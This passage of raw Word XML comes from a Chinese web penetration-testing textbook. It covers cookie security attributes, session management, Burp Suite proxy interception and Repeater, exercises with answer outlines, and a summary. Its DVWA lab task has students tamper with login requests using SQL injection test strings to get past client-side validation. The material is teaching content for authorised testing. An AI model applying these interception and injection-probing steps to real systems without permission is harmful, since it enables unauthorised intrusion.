        </w:rPr>
        <w:t xml:space="preserve">。对于确实需要跨站发送的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie，采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=None; Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并评估风险。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话管理标准化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用框架内置的安全会话模块，避免自行实现。确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">足够随机熵、固定存储于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且不暴露于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">框架保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：现代框架（Spring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Security、Django、ASP.NET Core </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）提供了内置的安全头中间件和自动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤，应优先采用而非手动拼接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:id="155" w:name="习题-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">基础提取题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三个属性分别解决了什么安全威胁？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy → Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Send to Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的区别是什么？在手工测试中各自适用于什么场景？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量需要在浏览器中导入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书？如果跳过此步骤会观察到什么现象？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题回归到攻击者能力的限制：中间人是否可以读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie？XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码能否读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie？跨站请求是否自动带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题的关键：Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是在“浏览器-服务器”的单次交互中实时截停修改，Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则允许脱离浏览器多次发送精心构造的请求并对比响应。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书信任链原理：Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对每个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">站点签发一个动态证书，浏览器必须信任签发这些证书的根</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答概要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防止中间人通过被动监听</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明文获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阻止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入脚本直接读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过阻止跨站子请求自动携带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie，从根本上缓解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击。三者均为纵深防御，实际安全需与其它机制联合运用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是阻塞模式，用于截获原始请求并实时修改后再放行，适合快速篡改和观察单次响应；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是非阻塞的独立编辑器，可将一次请求反复修改发送，并完整查看每次的请求和响应，适合手工构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和逐步推断。两者通常配合：先用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intercept </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">捕获感兴趣的请求，右键发送到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Repeater </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行深度分析。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为中间人，使用自己的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为每个目标站点签发证书。若浏览器不信任该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CA，就会弹出“您的连接不是私密连接”之类的证书错误，导致</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求中断。导入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书使得浏览器信任</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签发的所有证书，从而解密并代理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量。这是授权的安全测试专用操作，绝不应在非受控系统上执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机（或本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章中搭建的任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机），在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拦截某登录表单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。尝试修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数为错误凭据、空字符串或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入测试字符串（如单引号），观察响应差异。修改后转发并查看页面反应，并思考：为什么同样是通过浏览器发送请求，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改就能绕过前端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">校验？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkStart w:id="156" w:name="小结-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身无安全状态，现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全属性、Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">管理实践以及一组安全响应头（CSP、HSTS、SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）在应用层和浏览器层叠加防御，这些机制是渗透测试的核心检查对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截器提供了一个透明的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中间人观察点，使安全测试人员能够查看并修改浏览器发出的所有请求，从而绕过客户端校验、发现隐藏参数、测试服务端逻辑漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理配置流程可归纳为三要素：监听端口、浏览器代理设置、CA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书信任。三种常见排错场景（代理不通、证书错误、请求绕行）各有明确的排查路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实时截停-修改-转发与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">独立重放构成了手工</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试的基本工作循环，后续各章针对具体漏洞的演示将反复沿用这一操作模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御侧应确保所有响应均携带一致的安全头、会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具备完整安全属性，并通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架统一实施，而非依赖开发者主观记忆。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节内容与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（XSS/CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的攻击）、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
